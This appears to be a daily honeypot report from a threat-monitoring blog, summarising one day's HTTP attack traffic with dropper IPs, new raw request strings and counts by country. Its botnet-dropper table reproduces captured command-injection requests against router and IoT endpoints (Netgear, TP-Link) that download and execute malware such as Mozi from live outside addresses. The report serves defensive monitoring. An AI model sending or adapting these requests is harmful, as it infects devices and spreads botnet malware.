Skip to main content
  1. Daily-Posts/

Report: 2025-06-29

·309 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-29
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 12 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1958 requests were recorded during the day, originating from 3 different countries, with a peak of 1268 requests coming from RU.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
NLIsrael

botnet_dropper_behaviour
#

remote_addrrequest
141.98.11.83GET /shell?rm arm7;wget http://141.98.11.83/m/arm7;chmod 777 arm7;./arm7 arm7 HTTP/1.1
103.77.43.111GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.77.43.111:46177/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.232.99/x/tplink+-O-

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
6681\x00\x0E8\x22ws\xA0\xB6\x19?\xEB\x00\x00\x00\x00\x00
6801\x00\x0E89\x83D\xAD*\xAB\xD17\x00\x00\x00\x00\x00
6851\x04\x01\x00P\xC4\xFBEt\x00
6861CONNECT 196.251.69.116:80 HTTP/1.0
7091\x00\x0E\x08\x85lk2\x86\x02\xF4\xF5\x00\x00\x00\x00\x00
7101\x00\x0E8\x85lk2\x86\x02\xF4\xF5\x00\x00\x00\x00\x00
7261\x00\x0E8^k.\xDE\xE7&*;\x00\x00\x00\x00\x00
7361\x00\x0E8\xB2R\xA4\x01h\xAD3K\x00\x00\x00\x00\x00
7381\x00\x0E\x08\xD1=1b\xF6\xB5\xDD\xDB\x00\x00\x00\x00\x00
7391\x00\x0E8\xD1=1b\xF6\xB5\xDD\xDB\x00\x00\x00\x00\x00
7421\x00\x0E\x08\x1Di`a\xFD\xC2\xE9^\x00\x00\x00\x00\x00
7431\x00\x0E8\x1Di`a\xFD\xC2\xE9^\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
01268RU
1297US
260NL
347BG
434JP
531SG
622SC
720AO
819LT
919DE
1016IN
1114GB
1214CN
1312CA
149ZA
159CH
168GH
178FR
187BR
197PL
206BE
216IL
225TR
234UA
243KZ
253NG
262MD
272VN
282IE
291HK
301ES
311KR
321CZ

Related

Report: 2025-06-28
·339 words
Repport Daily
Report: 2025-06-27
·336 words
Repport Daily
Report: 2025-06-26
·457 words
Repport Daily